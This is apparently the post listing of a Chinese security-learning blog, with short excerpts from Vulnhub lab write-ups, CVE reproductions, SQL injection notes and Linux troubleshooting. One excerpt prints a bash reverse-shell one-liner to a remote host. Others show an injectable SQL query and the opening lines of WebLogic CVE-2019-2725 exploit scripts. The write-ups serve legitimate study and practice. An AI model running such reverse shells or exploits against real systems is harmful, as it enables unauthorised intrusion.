原创 centos linux7忘記root密碼,進行密碼重置
小編今天就忘記Linux root 用戶的口令,下面就由小編來教教大家如果忘記root口令怎麼辦 第1步:開機後在內核上按“e”。 第二步:按e以後會進入內核啓動頁面,在linux16這行的後面輸入“rd.break console=t
原创 Docker鏡像服務器內編輯文件報錯 bash: vim: command not found
小編今天在自己搭建的docker鏡像服務器內,本來想修改一下服務器裏面的某個配置文件的,但是,在編輯文件的過程中顯示報錯,具體顯示如下: root@haha:/# nano bash: nano: command not found
原创 幾種SQL注入(insert,update,delete,`, \ 等。。。)
insert注入: $sql = "insert into user(username,password) values('$username','$password',)"; payload: 適用於字符型: ' or
原创 AI:WEB:02靶場題解
AI:WEB:02靶場題解 前期準備 鏡像下載 https://www.vulnhub.com/entry/ai-web-2,357/ 環境配置: 在VM以net連接打開虛擬機 使用的機器: 攻擊機:kali linux 靶機:i
原创 CVE-2019-11043遠程代碼執行漏洞復現
CVE-2019-11043遠程代碼執行漏洞復現 漏洞名稱: php fastcgi 遠程命令執行漏洞 漏洞類型: 遠程代碼執行漏洞 漏洞危害: 高危 漏洞來源: https://www.nginx.com/blog/php-fp
原创 AI:Web-1靶場題解
AI:Web-1靶場題解 前期準備 鏡像下載 https://www.vulnhub.com/entry/ai-web-1,353/ 環境配置: 在VM以net連接打開虛擬機 使用的機器: 攻擊機:kali linux 靶機:ip
原创 kali安裝教程及踩的坑
對於小編來說,這兩天真真是非常難受的。一直以來,小編得kali都是很友愛的童鞋幫小編安裝的,但是天道好輪迴,終究還是輪到小編我了。且說,這兩天小編都沒怎麼聽課,每節課都帶着筆記本,在老師的課堂上努力的安裝着kali。最終,小編自覺能力有限
原创 DC靶場1-6
靶機下載: https://download.vulnhub.com/dc/ 環境配置: 在VM以net連接打開虛擬機 使用的機器: 攻擊機:kali linux 靶機:DC1,2,4,5,6(IP隨配) DC1 1.nmap掃描
原创 Digitalworld.local: JOY Vulnhub靶場題解
前期準備 鏡像下載 https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ 環境配置: 在VM以net連接打開虛擬機 使用的機器: 攻擊機:kali linux,ubunt
原创 fastjson復現
fastjson2017-0315遠程代碼執行漏洞復現 漏洞名稱: fastjson遠程命令執行漏洞 漏洞類型: 遠程代碼執行漏洞 漏洞危害: 高危 漏洞來源: https://github.com/alibaba/fastjso
原创 Postgres漏洞復現
Postgres漏洞匯現 CVE-2018-1058 漏洞名稱: 遠程代碼執行漏洞 漏洞類型: 遠程代碼執行 公佈時間: 2018-3-1 涉及應用版本: PostgreSQL https://www.securityfocus.
原创 SQL注入知識彙總
SQL注入 基礎篇 原理: SQL注入,意思就是指 輸入一條SQL語句,插入到代碼中,修改後臺SQL語句,使程序執行,進而達到進行攻擊的目的 常用的SQL語句: 選擇(select)語句 select * from table_
原创 weblogic CVE-2019-2725 pocsuite3的 poc
import re from collections import OrderedDict from urllib.parse import urljoin from pocsuite3.api import Output,POCBa
原创 常用的反彈shell的語句
shell編碼:http://www.jackson-t.ca/runtime-exec-payloads.html bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash
原创 weblogic CVE-2019-2725 的一鍵腳本
# -*- coding: utf-8 -*- import requests import argparse class Exploit: def __init__(self, rhost, lport, lhost): se